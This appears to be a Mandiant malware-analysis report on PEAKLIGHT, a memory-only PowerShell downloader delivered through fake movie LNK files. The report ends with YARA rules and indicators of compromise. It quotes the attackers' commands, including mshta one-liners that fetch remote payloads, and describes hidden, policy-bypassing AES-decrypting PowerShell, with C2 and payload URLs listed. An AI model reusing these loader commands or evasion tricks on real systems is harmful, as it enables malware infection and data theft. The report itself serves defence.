PEAKLIGHT: Decoding the Stealthy Memory-Only Malware

Written by: Aaron Lee, Praveeth DSouza

TL;DR

Mandiant identified a new memory-only dropper using a complex, multi-stage infection process. This memory-only dropper decrypts and executes a PowerShell-based downloader. This PowerShell-based downloader is being tracked as PEAKLIGHT.

Overview

Mandiant Managed Defense identified a memory-only dropper and downloader delivering malware-as-a-service infostealers. During our investigation, Mandiant observed the malware download payloads such as LUMMAC.V2 (LUMMAC2), SHADOWLADDER, and CRYPTBOT. Mandiant identified the initial infection vector as a Microsoft Shortcut File (LNK) that connects to a content delivery network (CDN) hosting an obfuscated memory-only JavaScript dropper. Analysis of the payload revealed that it executes a PowerShell downloader script on the host. Mandiant named this final downloader PEAKLIGHT.

Infection Chain

Stage 1: Movie Lures; A Blast from the Past 

In recent investigations, Mandiant identified victims downloading malicious ZIP files disguised as pirated movies. These archives contained a malicious Microsoft Shortcut File (LNK) following the filename schema seen in Figure 2:

* Video_mp4_1080p_x264.zip -> The Movie (HD).lnk
* Video_mp4_[1080p].zip -> Full Movie 1080p HD.lnk
* @!Movie_HD_1080p_mp4_@!.zip -> Full Movie HD (1080p).lnk
* mp4_Full_Video_HD_1080p@!.zip -> Full Video (HD) mp4.lnk

Figure 2: Initial infection

During an associated investigation within a client environment, Mandiant identified anomalous outbound network activity to the IP address 62.133.61[.]56. The XML page seen in Figure 3 was subsequently discovered at the URL hxxp://62.133.61[.]56/Downloads.

Of particular interest was this snippet from the XML markup, seen in Figure 4.

<D:href>/Downloads/Full%20Video%20HD%20%281080p%29.lnk</D:href>
    <D:propstat>
        <D:prop>
            <D:resourcetype></D:resourcetype>
            <D:displayname>Full Video HD (1080p).lnk</D:displayname>
            <D:getcontenttype>application/octet-stream</D:getcontenttype>
            <D:getetag>"17d6b3e5205a12a0460"</D:getetag>
            <D:getcontentlength>1120</D:getcontentlength>
            <D:getlastmodified>Fri, 07 Jun 2024 11:01:44 GMT</D:getlastmodified>
            <D:supportedlock>

Figure 4: Forwarding mechanism

Based on the contents of Figure 4, this code may have served as a redirect or forwarding mechanism for the URL hxxp://62.133.61[.]56/Downloads/Full Video HD (1080p).lnk (MD5: 62f20122a70c0f86a98ff14e84bcc999). Mandiant subsequently acquired this file and determined it was a LNK file configured with a media file icon (Figure 5).

LNK files are a common tactic used by threat actors to trick unsuspecting users into unknowingly executing malware. These files can be disguised as legitimate documents or programs, making them effective for hiding in plain sight.

At this stage in the investigation, Mandiant identified different command variations within the parameters of the LNK file.

Variation 1

The parameters portion of the LNK file was configured to leverage the legitimate Microsoft utility forfiles.exe to search for the file win.ini and execute a PowerShell script. Mandiant observed the execution of the following command (Figure 6):

forfiles.exe /p C:\Windows /m win.ini /c "powershell . 
mshta https://nextomax.b-cdn[.]net/nexto"

Figure 6: Initial PowerShell script variation 1

This command:

• Uses the /p command switch for forfiles.exe to set the designated file search path to C:\Windows.

• Uses the /m command switch to look for files matching the name win.ini. Then, for each match (though on typical Windows installations there will only be one):

• Starts powershell.exe with configurations to load a localized or dot-sourced script, which is signified by the "." (in this case, the output generated by the rest of the command-line parameters).

• Retrieves a second-stage payload from the URL hxxps://nextomax.b-cdn[.]net/nexto.

• Executes the retrieved payload via mshta.exe.

After executing this LNK file, Windows Media Player was opened on the affected host, and a video of a prominent film studio's opening logo reel played automatically.

This video file was simply called video.mp4 (MD5: 91423dd4f34f759aaf82aa73fa202120) and presumably served as a "cover" video to attempt to alleviate suspicions that the affected host had, in reality, been infected with malware.

Variation 2

In a different investigation, Mandiant observed the parameters portion of the LNK file initiated a PowerShell command that employed asterisks (*) as wildcards to launch mshta.exe to discreetly run malicious code retrieved from a remote server.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 
.(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').
('PSChildName')hxxps://potexo.b-cdn[.]net/potexo

Figure 7: Initial PowerShell script variation 2

This command:

• Runs a script signified by the dot sourcing operator ".".

• Uses the Get-ItemProperty (gp) to point to the Mshta registry hive and psChildName to specify the object, mshta.exe.

• Retrieves the second-stage payload from the URL hxxps://potexo.b-cdn[.]net/potexo and executes via mshta.exe.

The attackers employed the following evasion techniques to further cover their tracks:

• System Binary Proxy Execution: By using mshta.exe, the attackers execute malicious code directly from a remote server, bypassing application control solutions and browser security settings. 

• Content Delivery Network Abuse: The attackers took advantage of a reputable content delivery network (Bunny CDN) to host their malicious payloads. This abuse of trust associated with CDNs allowed them to circumvent security filters that might not scrutinize traffic from known, trusted sources.

Both variations utilize MITRE ATT&CK® Technique T1218.005: System Binary Proxy Execution: Mshta.

Stage 2: JavaScript Dropper

Figure 8 shows analysis of the HTML file cached on the CDN contained an obfuscated memory-only JavaScript dropper.

The script begins by assigning decimal-encoded ASCII characters to randomly named variables. The String.fromCharCode() function is then used to convert the decimal-encoded characters back into their corresponding ASCII characters to decode the JavaScript dropper embedded within the script.

Mandiant identified an embedded payload after decoding the JavaScript dropper, seen in Figure 9.

The script in Figure 9 carries out the following actions:

1. Decoding Function (wAJ)

• The function receives an array of numbers, decodes each by subtracting 619, and then converts the result to its corresponding character using String.fromCharCode(). These characters are then combined to produce the final, decoded string, which is returned by the function.

2. Payload (KbX, YmD)

• The variables KbX and YmD contain obfuscated data, which is decoded by the wAJ function.

3. ActiveXObject

• The script employs a decoded variable YmD, which resolves to Wscript.shell, to create a new ActiveX object. This object grants the script system-level privileges to execute commands.

4. IMD.Run

• Executes the decoded KbX command.

• Parameters:

• 0: This parameter instructs the command to run in a hidden window, keeping its actions concealed from the user.

• true: This parameter ensures the script waits for the command to complete its execution before moving on to any subsequent steps.

The payload (KbX) was abbreviated to maintain a concise presentation.

Note: Mandiant used this CyberChef recipe to successfully decode the obfuscated JavaScript dropper.

Variation 1: Hex-Encoded Payload

The first command conceals its malicious payload within a string of hexadecimal characters. The execution process adheres to the following sequence:

• Stealthy PowerShell Launch: The command initiates PowerShell in a hidden window (-w 1), bypasses execution restrictions (-ep Unrestricted), and skips loading user profiles (-nop), ensuring covert operations.

• Hex to Byte Conversion: A custom function (ffQiHkvB) is defined to transform the hexadecimal string into a byte array, a standard format for storing data.

• Decryption: The script creates an Advanced Encryption Standard (CBC mode) decryptor using a hex key. The byte array is decrypted, revealing the actual PowerShell code.

• Execution: Finally, the decrypted PowerShell code is executed.

Note: Mandiant decoded the payload using a custom CyberChef recipe.

Variation 2: Base64-Encoded Payload

The second command follows a similar structure but with key differences: the malicious payload is encoded using Base64 instead of hexadecimal and is executed through a memory stream.

• Stealth and Configuration: The initial steps to launch PowerShell in a hidden, unrestricted mode are the same as in Variation 1.

• Base64 Decoding: Instead of a custom function, this variant directly uses PowerShell's built-in FromBase64String method to decode the payload. 

• Decryption, Decompression, and Execution: The payload is decrypted using AES (ECB mode) with a Base64-encoded key. After decryption, the payload is decompressed into memory using GZIP, revealing the PowerShell code, which is subsequently executed.

Stage 3: PEAKLIGHT; The PowerShell Downloader

PEAKLIGHT is an obfuscated PowerShell-based downloader that checks for the presence of hard-coded filenames and downloads files from a remote CDN if the files are not present. 

During our analysis, Mandiant identified the following key differences across the variations of the PEAKLIGHT script:

• Target Directory: 
  • Variation 1 downloads files to $env:AppData.
  • Variation 2 downloads files to $env:ProgramData.
• Execution Logic: 
  • Variation 1 executes the first alphabetically sorted file in the archive. 
  • Variation 2 executes the first file found in the archive.
• File Name: 
  • Variation 1 downloads files as L1.zip and L2.zip.
  • Variation 2 downloads files as K1.zip and K2.zip. 
• Additional Actions: 
  • Variation 1 also downloads an image (video.mp4) and makes a request to a remote server. 
  • Variation 2 does not download an image file.

Note: Mandiant decoded the obfuscated payload using a custom CyberChef recipe.

Variation 1

This PEAKLIGHT downloader is designed to execute the following tasks:

1. znY: Writes data to a file.

2. nbF: Extracts a ZIP archive and runs the first executable file inside.

3. aXR: Downloads data from an obfuscated URL.

4. jkg: Deobfuscates a string.

Main Function (AsD)

• Video Playback or Download: It checks if video.mp4 exists in the AppData folder. If it exists, it plays the video. If not, it downloads the video from a specified URL, saves it as video.mp4 in the AppData folder, and then plays it.

• Image Download: It downloads an image from https://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png using Invoke-WebRequest.

• ZIP File Handling:

• It checks if L1.zip exists in the AppData folder.

• If it exists, it extracts its contents to the AppData folder and runs the first executable file found within the ZIP.

• If not, it downloads L1.zip from a specified URL, saves it in the AppData folder, extracts its contents, and runs the first executable.

• It repeats the same process for L2.zip.

Analysis of the PEAKLIGHT downloader outlined in Figure 12 revealed the following URIs:

• https://nextomax.b-cdn[.]net/video.mp4

• https://nextomax.b-cdn[.]net/L1.zip

• https://nextomax.b-cdn[.]net/L2.zip

• https://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png 

Variation 2

This PEAKLIGHT downloader is designed to deliver and execute additional payloads on a compromised system.

The functions:

1. qXF($EGa, $aQU): The purpose of this function is to write data to a file.
2. Irl($EGa): Extracts a ZIP archive and runs an executable from it.
3. OBs($BYu):  Downloads data from a URL.
4. Fzl($XFW): Deobfuscates an array of numbers into a string (likely a URL).

Main Execution (bSo function):

• Defines two ZIP file paths: K1.zip and K2.zip within the ProgramData directory.

• For each of these ZIP files, it checks if they already exist.

• If the file exists, it simply unzips it using the Irl function.

• If the file is missing, it first uses the function Fzl to decode an obfuscated web address, then downloads the ZIP file from that address using the function OBs. Finally, it unzips the downloaded file using the function Irl.

Analysis of the PEAKLIGHT downloader outlined in Figure 13 revealed the following URIs:

• https://potexo.b-cdn[.]net/K1.zip

• https://potexo.b-cdn[.]net/K2.zip

Additionally, Mandiant identified other PEAKLIGHT downloader samples connecting to various subdomains hosted on Bunny CDN. These samples will be discussed in more detail in the subsequent stage of analysis.

Stage 4: The Final Payload

Variation 1: L1.zip and L2.zip

Having explored the initial stages of the PEAKLIGHT downloader's operation, our focus now shifts to the payload it delivers. As detailed in Variation 1 of Stage 3, this downloader was observed downloading three specific files: L1.zip, L2.zip, and video.mp4. Mandiant successfully acquired and extracted the contents of the files, as seen in Table 1.

1. L2.zip contained the following:
   • Setup.exe: This executable is a variant of the Cryptbot infostealer. Our analysis uncovered the following embedded URLs:
     1. https://brewdogebar[.]com/code.vue
     2. http://gceight8vt[.]top/upload.php
2. L1.zip contained the following:
   • bentonite.cfg: This file contains malware configurations that are linked to the SHADOWLADDER malware family.
   • LiteSkinUtils.dll: It is a malicious component used by SHADOWLADDER malware to facilitate the execution of its second-stage payload through dynamic-link library (DLL) side-loading.
3. Video.mp4
   • This file appears to be a legitimate movie trailer, likely used as a decoy to deceive the victim into believing that the downloaded files are safe.

Variation 2: K1.zip and K2.zip

The second variant of the PEAKLIGHT downloader, discussed in Variation 2 of Stage 3, was observed downloading two archives: K1.zip and K2.zip.

1. K1.zip contained the following:
   • toughie.txt: This file contained configurations related to the SHADOWLADDER malware.
   • aaaa.exe & WCLDll.dll: These binaries are DLL files that SHADOWLADDER patches to leverage their HTTP download functionality.
2. K2.zip contained the following:
   • Jfts.exe: This file is a renamed copy of the previously mentioned aaaa.exe.

Upon execution, Jfts.exe loads the malicious WCLDll.dll from K1.zip. This DLL then leverages the "More Utility" (more.com) to stealthily drop two additional files:

• \AppData\Local\Temp\Hofla.au3 (MD5: c56b5f0201a3b3de53e561fe76912bfd): Identified as an AutoIt3.exe binary.
• \AppData\Local\Temp\erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c): Further analysis of this files confirmed their association with the CRYPTBOT.AUTOIT malware.

Variation 3: Additional PEAKLIGHT Variant

Further analysis has identified an additional PEAKLIGHT downloader variant employing distinct tactics. This variant retrieves its payload,the archives K1.zip and K2.zip, from the domain matodown.b-cdn[.]net. A detailed breakdown of the contents within these archives is presented in Table 3.

1. K1.zip contained the following:
   • cymophane.doc: This file contained configurations related to the SHADOWLADDER malware.
   • WebView2Loader.dll: This malicious DLL was observed to be dropped by the LummaC.V2 infostealer.
2. K2.zip contained the following:
   • Hgjke.exe: Identified as a renamed copy of the legitimate "JRiver Web Application" executable. During dynamic analysis, hgjke.exe was observed loading the malicious WebView2Loader.dll. Mandiant observed hgjke.exe utilize the comp.exe utility to drop two additional files:
     • AppData\Local\Temp\Ufa.au3 (MD5: c56b5f0201a3b3de53e561fe76912bfd): Identified as an AutoIt3 binary.
     • AppData\Local\Temp\oqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4): Further analysis confirmed this file to be consistent with the LummaC.V2 payload.

Conclusion

PEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain that checks for the presence of ZIP archives in hard-coded file paths. If the archives do not exist, the downloader will reach out to a CDN site and download the remotely hosted archive file and save it to disk. PEAKLIGHT was observed downloading payloads such as LUMMAC.V2, SHADOWADDER, and CRYPTBOT. The malware developers used several different obfuscation and evasion techniques, including system binary proxy execution and CDN abuse. Mandiant identified different variations of the PEAKLIGHT downloader, each with its own unique characteristics.

We encourage security researchers to remain vigilant and share any insights or similar malware samples they encounter. By working together and fostering open communication within the cybersecurity community, we can better understand the evolving threat landscape and strengthen our collective defenses against future attacks.

Protect and scan your environment against the indicators of compromise and YARA rules in the following section. If you suspect that your environment may have been compromised, contact our Incident Response team for assistance.

Acknowledgements

We would like to thank Adrian McCabe for assistance with LNK research and subject matter expertise, Raymond Leong for the initial analysis of malware stages and payloads, and the Mandiant Research Team for their valuable feedback.

Detections

Yara Rules

rule M_AES_Encrypted_payload {
  meta:
    author = "Mandiant"
    description = "This rule is desgined to detect on events that 
exhibits indicators of utilizing AES encryption for payload obfuscation."
    target_entity = "Process"
  strings:
    $a = /(\$\w+\.Key(\s|)=((\s|)(\w+|));|\$\w+\.Key(\s|)=(\s|)\w+\('\w+'\);)/
    $b = /\$\w+\.IV/
    $c = /System\.Security\.Cryptography\.(AesManaged|Aes)/
  condition:
    all of them
}

rule M_Downloader_PEAKLIGHT_1 {
    meta:
    	mandiant_rule_id = "e0abae27-0816-446f-9475-1987ccbb1bc0"
        author = Mandiant
        category = "Malware"
        description = "This rule is designed to detect on events related to peaklight. 
PEAKLIGHT is an obfuscated PowerShell-based downloader which checks for 
the presence of hard-coded filenames and downloads files from a remote CDN 
if the files are not present."
        family = "Peaklight"
        platform = "Windows"
    strings:
        $str1 = /function\s{1,16}\w{1,32}\(\$\w{1,32},\s{1,4}\$\w{1,32}\)\
{\[IO\.File\]::WriteAllBytes\(\$\w{1,32},\s{1,4}\$\w{1,32}\)\}/ ascii wide 
        $str2 = /Expand-Archive\s{1,16}-Path\s{1,16}\$\w{1,32}\
s{1,16}-DestinationPath/ ascii wide
        $str3 = /\(\w{1,32}\s{1,4}@\((\d{3,6},){3,12}/ ascii wide
        $str4 = ".DownloadData(" ascii wide
        $str5 = "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12" ascii wide
        $str6 = /\.EndsWith\(((["']\.zip["'])|(\(\w{1,32}\s{1,16}@\((\d{3,6},){3}\d{3,6}\)\)))/ ascii wide
        $str7 = "Add -Type -Assembly System.IO.Compression.FileSystem" ascii wide
	$str8 = "[IO.Compression.ZipFile]::OpenRead"
    condition:
	    4 of them and filesize < 10KB         
}

Indicators of Compromise (IOCs)

Network-Based IOCs

PEAKLIGHT NBIs:
hxxps://fatodex.b-cdn[.]net/fatodex
hxxps://matodown.b-cdn[.]net/matodown
hxxps://potexo.b-cdn[.]net/potexo

LUMMAC.V2 C2s:
relaxtionflouwerwi[.]shop
deprivedrinkyfaiir[.]shop
detailbaconroollyws[.]shop
messtimetabledkolvk[.]shop
considerrycurrentyws[.]shop
understanndtytonyguw[.]shop
patternapplauderw[.]shop
horsedwollfedrwos[.]shop
tropicalironexpressiw[.]shop

CRYPTBOT C2s:
hxxp://gceight8vt[.]top/upload.php
hxxps://brewdogebar[.]com/code.vue

SHADOWLADDER:
hxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk
hxxps://fatodex.b-cdn[.]net/K1.zip
hxxps://fatodex.b-cdn[.]net/K2.zip
hxxps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png
hxxps://matodown.b-cdn[.]net/K1.zip
hxxps://matodown.b-cdn[.]net/K2.zip
hxxps://nextomax.b-cdn[.]net/L1.zip
hxxps://nextomax.b-cdn[.]net/L2.zip
hxxps://potexo.b-cdn[.]net/K1.zip
hxxps://potexo.b-cdn[.]net/K2.zip

Host-Based IOCs

CRYPTBOT:
erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c)
L2.zip (MD5: 307f40ebc6d8a207455c96d34759f1f3)
Sеtup.exe (MD5: d8e21ac76b228ec144217d1e85df2693)

LUMMAC.V2:
oqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4)
WebView2Loader.dll (MD5: 58c4ba9385139785e9700898cb097538)

PEAKLIGHT:
Downloader (MD5: 95361f5f264e58d6ca4538e7b436ab67)
Downloader (MD5: b716a1d24c05c6adee11ca7388b728d3) 

SHADOWLADDER:
Aaaa.exe (MD5: b15bac961f62448c872e1dc6d3931016)
bentonite.cfg (MD5: e7c43dc3ec4360374043b872f934ec9e)
cymophane.doc (MD5: f98e0d9599d40ed032ff16de242987ca)
K1.zip (MD5: b6b8164feca728db02e6b636162a2960)
K1.zip (MD5: bb9641e3035ae8c0ab6117ecc82b65a1)
K2.zip (MD5: 236c709bbcb92aa30b7e67705ef7f55a)
K2.zip (MD5: d7aff07e7cd20a5419f2411f6330f530)
L1.zip (MD5: a6c4d2072961e9a8c98712c46be588f8)
LiteSkinUtils.dll (MD5: 059d94e8944eca4056e92d60f7044f14)
toughie.txt (MD5: dfdc331e575dae6660d6ed3c03d214bd)
WCLDll.dll (MD5: 47eee41b822d953c47434377006e01fe)